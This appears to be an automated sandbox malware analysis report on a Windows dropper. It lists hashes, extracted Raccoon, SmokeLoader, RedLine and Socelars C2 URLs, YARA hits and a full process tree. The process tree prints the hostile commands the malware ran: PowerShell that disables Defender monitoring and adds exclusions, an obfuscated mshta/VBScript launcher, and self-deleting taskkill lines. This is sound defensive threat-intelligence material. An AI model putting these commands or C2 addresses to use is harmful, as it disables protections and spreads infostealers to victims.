Overview
overview
10Static
static
022e3c30a1...66.exe
windows7_x64
10022e3c30a1...66.exe
windows10_x64
10043d28836f...9f.exe
windows7_x64
10043d28836f...9f.exe
windows10_x64
10096fc162ed...c8.exe
windows7_x64
10096fc162ed...c8.exe
windows10_x64
101ad787b5aa...62.exe
windows7_x64
101ad787b5aa...62.exe
windows10_x64
10258cbb13ac...bd.exe
windows7_x64
10258cbb13ac...bd.exe
windows10_x64
1025d79c1a50...7f.exe
windows7_x64
1025d79c1a50...7f.exe
windows10_x64
104d27dca0a1...ef.exe
windows7_x64
104d27dca0a1...ef.exe
windows10_x64
10500e7e5c00...44.exe
windows7_x64
10500e7e5c00...44.exe
windows10_x64
10578a3a7a2b...b3.exe
windows7_x64
10578a3a7a2b...b3.exe
windows10_x64
107dc7ca2414...84.exe
windows7_x64
107dc7ca2414...84.exe
windows10_x64
1096c9fde298...34.exe
windows7_x64
1096c9fde298...34.exe
windows10_x64
109c4880a98c...82.exe
windows7_x64
109c4880a98c...82.exe
windows10_x64
10a1dad4a83d...c4.exe
windows7_x64
10a1dad4a83d...c4.exe
windows10_x64
10acf1b7d80f...e0.exe
windows7_x64
10acf1b7d80f...e0.exe
windows10_x64
10ca14b87b56...83.exe
windows7_x64
10ca14b87b56...83.exe
windows10_x64
10cbf31d825a...d2.exe
windows7_x64
8cbf31d825a...d2.exe
windows10_x64
10Analysis
-
max time kernel
29s -
max time network
171s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
08-11-2021 10:07
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211104
Behavioral task
behavioral3
Sample
043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe
Resource
win7-en-20211014
Behavioral task
behavioral4
Sample
043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe
Resource
win10-en-20211104
Behavioral task
behavioral5
Sample
096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe
Resource
win7-en-20211014
Behavioral task
behavioral6
Sample
096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe
Resource
win7-en-20211014
Behavioral task
behavioral8
Sample
1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe
Resource
win10-en-20211104
Behavioral task
behavioral9
Sample
258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
Resource
win7-en-20211104
Behavioral task
behavioral10
Sample
258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
Resource
win10-en-20211014
Behavioral task
behavioral11
Sample
25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
Resource
win7-en-20211104
Behavioral task
behavioral12
Sample
25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
Resource
win10-en-20211014
Behavioral task
behavioral13
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win7-en-20211104
Behavioral task
behavioral14
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-en-20211014
Behavioral task
behavioral15
Sample
500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe
Resource
win7-en-20211104
Behavioral task
behavioral16
Sample
500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe
Resource
win10-en-20211104
Behavioral task
behavioral17
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win7-en-20211014
Behavioral task
behavioral18
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-en-20211104
Behavioral task
behavioral19
Sample
7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe
Resource
win7-en-20211014
Behavioral task
behavioral20
Sample
7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe
Resource
win10-en-20211104
Behavioral task
behavioral21
Sample
96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
Resource
win7-en-20211014
Behavioral task
behavioral22
Sample
96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
Resource
win10-en-20211104
Behavioral task
behavioral23
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win7-en-20211104
Behavioral task
behavioral24
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-en-20211014
Behavioral task
behavioral25
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win7-en-20211104
Behavioral task
behavioral26
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-en-20211014
Behavioral task
behavioral27
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win7-en-20211104
Behavioral task
behavioral28
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-en-20211014
Behavioral task
behavioral29
Sample
ca14b87b565c6b1c90eb3365bed694bd9e8a8b3d0ab6e3ca0c680baec6422f83.exe
Resource
win7-en-20211104
Behavioral task
behavioral30
Sample
ca14b87b565c6b1c90eb3365bed694bd9e8a8b3d0ab6e3ca0c680baec6422f83.exe
Resource
win10-en-20211104
Behavioral task
behavioral31
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win7-en-20211014
Behavioral task
behavioral32
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-en-20211104
General
-
Target
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
-
Size
4.6MB
-
MD5
4f85f62146d5148f290ff107d4380941
-
SHA1
5c513bcc232f36d97c2e893d1c763f3cbbf554ff
-
SHA256
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3
-
SHA512
bc4ae4f7101b20ab649ea2a44d5da42875af5068c33c1772960c342cc8731bddfdabd721fb31a49523ea957615252d567a00346035bddacfa58cf97853587594
Malware Config
Extracted
raccoon
2f2ad1a1aa093c5a9d17040c8efd5650a99640b5
-
url4cnc
http://telegatt.top/oh12manymarty
http://telegka.top/oh12manymarty
http://telegin.top/oh12manymarty
https://t.me/oh12manymarty
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Extracted
redline
Chris
194.104.136.5:46013
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral17/memory/2196-219-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral17/memory/2196-220-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral17/memory/2196-218-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral17/files/0x00050000000132ec-158.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
resource yara_rule behavioral17/files/0x00050000000132e0-71.dat aspack_v212_v242 behavioral17/files/0x00050000000132de-73.dat aspack_v212_v242 behavioral17/files/0x00050000000132e0-72.dat aspack_v212_v242 behavioral17/files/0x00050000000132de-74.dat aspack_v212_v242 behavioral17/files/0x00050000000132e4-77.dat aspack_v212_v242 behavioral17/files/0x00050000000132e4-78.dat aspack_v212_v242 -
Executes dropped EXE 7 IoCs
pid Process 764 setup_installer.exe 864 setup_install.exe 1956 Tue193e530416b51740a.exe 1928 Tue19c9e031f4.exe 1944 Tue19ac3c92c21.exe 816 Tue19c28f648204dbd4.exe 940 Tue1968b7ee9058232e8.exe -
Loads dropped DLL 29 IoCs
pid Process 304 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe 764 setup_installer.exe 764 setup_installer.exe 764 setup_installer.exe 764 setup_installer.exe 764 setup_installer.exe 764 setup_installer.exe 864 setup_install.exe 864 setup_install.exe 864 setup_install.exe 864 setup_install.exe 864 setup_install.exe 864 setup_install.exe 864 setup_install.exe 864 setup_install.exe 1936 cmd.exe 1936 cmd.exe 1788 cmd.exe 1736 cmd.exe 1728 cmd.exe 1728 cmd.exe 816 Tue19c28f648204dbd4.exe 816 Tue19c28f648204dbd4.exe 1956 Tue193e530416b51740a.exe 1956 Tue193e530416b51740a.exe 1944 Tue19ac3c92c21.exe 1944 Tue19ac3c92c21.exe 940 Tue1968b7ee9058232e8.exe 940 Tue1968b7ee9058232e8.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 40 ipinfo.io 41 ipinfo.io 57 ipinfo.io 58 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 552 864 WerFault.exe 29 -
Kills process with taskkill 1 IoCs
pid Process 2796 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 304 wrote to memory of 764 304 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe 28 PID 304 wrote to memory of 764 304 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe 28 PID 304 wrote to memory of 764 304 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe 28 PID 304 wrote to memory of 764 304 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe 28 PID 304 wrote to memory of 764 304 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe 28 PID 304 wrote to memory of 764 304 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe 28 PID 304 wrote to memory of 764 304 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe 28 PID 764 wrote to memory of 864 764 setup_installer.exe 29 PID 764 wrote to memory of 864 764 setup_installer.exe 29 PID 764 wrote to memory of 864 764 setup_installer.exe 29 PID 764 wrote to memory of 864 764 setup_installer.exe 29 PID 764 wrote to memory of 864 764 setup_installer.exe 29 PID 764 wrote to memory of 864 764 setup_installer.exe 29 PID 764 wrote to memory of 864 764 setup_installer.exe 29 PID 864 wrote to memory of 1084 864 setup_install.exe 31 PID 864 wrote to memory of 1084 864 setup_install.exe 31 PID 864 wrote to memory of 1084 864 setup_install.exe 31 PID 864 wrote to memory of 1084 864 setup_install.exe 31 PID 864 wrote to memory of 1084 864 setup_install.exe 31 PID 864 wrote to memory of 1084 864 setup_install.exe 31 PID 864 wrote to memory of 1084 864 setup_install.exe 31 PID 864 wrote to memory of 1540 864 setup_install.exe 32 PID 864 wrote to memory of 1540 864 setup_install.exe 32 PID 864 wrote to memory of 1540 864 setup_install.exe 32 PID 864 wrote to memory of 1540 864 setup_install.exe 32 PID 864 wrote to memory of 1540 864 setup_install.exe 32 PID 864 wrote to memory of 1540 864 setup_install.exe 32 PID 864 wrote to memory of 1540 864 setup_install.exe 32 PID 1540 wrote to memory of 1208 1540 cmd.exe 33 PID 1540 wrote to memory of 1208 1540 cmd.exe 33 PID 1540 wrote to memory of 1208 1540 cmd.exe 33 PID 1540 wrote to memory of 1208 1540 cmd.exe 33 PID 1540 wrote to memory of 1208 1540 cmd.exe 33 PID 1540 wrote to memory of 1208 1540 cmd.exe 33 PID 1540 wrote to memory of 1208 1540 cmd.exe 33 PID 864 wrote to memory of 1788 864 setup_install.exe 34 PID 864 wrote to memory of 1788 864 setup_install.exe 34 PID 864 wrote to memory of 1788 864 setup_install.exe 34 PID 864 wrote to memory of 1788 864 setup_install.exe 34 PID 864 wrote to memory of 1788 864 setup_install.exe 34 PID 864 wrote to memory of 1788 864 setup_install.exe 34 PID 864 wrote to memory of 1788 864 setup_install.exe 34 PID 864 wrote to memory of 1448 864 setup_install.exe 35 PID 864 wrote to memory of 1448 864 setup_install.exe 35 PID 864 wrote to memory of 1448 864 setup_install.exe 35 PID 864 wrote to memory of 1448 864 setup_install.exe 35 PID 864 wrote to memory of 1448 864 setup_install.exe 35 PID 864 wrote to memory of 1448 864 setup_install.exe 35 PID 864 wrote to memory of 1448 864 setup_install.exe 35 PID 864 wrote to memory of 920 864 setup_install.exe 36 PID 864 wrote to memory of 920 864 setup_install.exe 36 PID 864 wrote to memory of 920 864 setup_install.exe 36 PID 864 wrote to memory of 920 864 setup_install.exe 36 PID 864 wrote to memory of 920 864 setup_install.exe 36 PID 864 wrote to memory of 920 864 setup_install.exe 36 PID 864 wrote to memory of 920 864 setup_install.exe 36 PID 864 wrote to memory of 1936 864 setup_install.exe 37 PID 864 wrote to memory of 1936 864 setup_install.exe 37 PID 864 wrote to memory of 1936 864 setup_install.exe 37 PID 864 wrote to memory of 1936 864 setup_install.exe 37 PID 864 wrote to memory of 1936 864 setup_install.exe 37 PID 864 wrote to memory of 1936 864 setup_install.exe 37 PID 864 wrote to memory of 1936 864 setup_install.exe 37 PID 864 wrote to memory of 1736 864 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true4⤵PID:1084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe4⤵
- Loads dropped DLL
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19ac3c92c21.exeTue19ac3c92c21.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe4⤵PID:1448
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19c9e031f4.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19c9e031f4.exe"5⤵PID:1100
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19c9e031f4.exeTue19c9e031f4.exe5⤵
- Executes dropped EXE
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1932df4dae.exe4⤵PID:920
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1932df4dae.exeTue1932df4dae.exe5⤵PID:1172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe4⤵
- Loads dropped DLL
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exeTue193e530416b51740a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exeC:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exe6⤵PID:472
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exeC:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exe6⤵PID:2196
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exeC:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193e530416b51740a.exe6⤵PID:2132
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe4⤵
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19c28f648204dbd4.exeTue19c28f648204dbd4.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe4⤵PID:1884
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue197e9ec0ff0.exeTue197e9ec0ff0.exe5⤵PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe4⤵PID:620
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19d1fc7d2654d7a.exeTue19d1fc7d2654d7a.exe5⤵PID:616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe4⤵PID:1972
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19b4b38a7569a9.exeTue19b4b38a7569a9.exe5⤵PID:888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe4⤵PID:304
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19f40f8518b9946.exeTue19f40f8518b9946.exe5⤵PID:340
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 4924⤵
- Program crash
PID:552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe4⤵PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19cef5687a.exe4⤵PID:1920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe4⤵PID:268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone4⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe4⤵PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe4⤵
- Loads dropped DLL
PID:1728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue19cef5687a.exeTue19cef5687a.exe1⤵PID:684
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))1⤵PID:2236
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f2⤵PID:2616
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Tue1932df4dae.exe" /f3⤵
- Kills process with taskkill
PID:2796
-
-
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ3⤵PID:2784
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue193129b31e741ef3.exeTue193129b31e741ef3.exe1⤵PID:2076
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:2772
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue192c34b1c2f5.exeTue192c34b1c2f5.exe /mixone1⤵PID:1476
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue192c34b1c2f5.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue192c34b1c2f5.exe" & exit2⤵PID:2308
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCF23E176\Tue1968b7ee9058232e8.exeTue1968b7ee9058232e8.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:940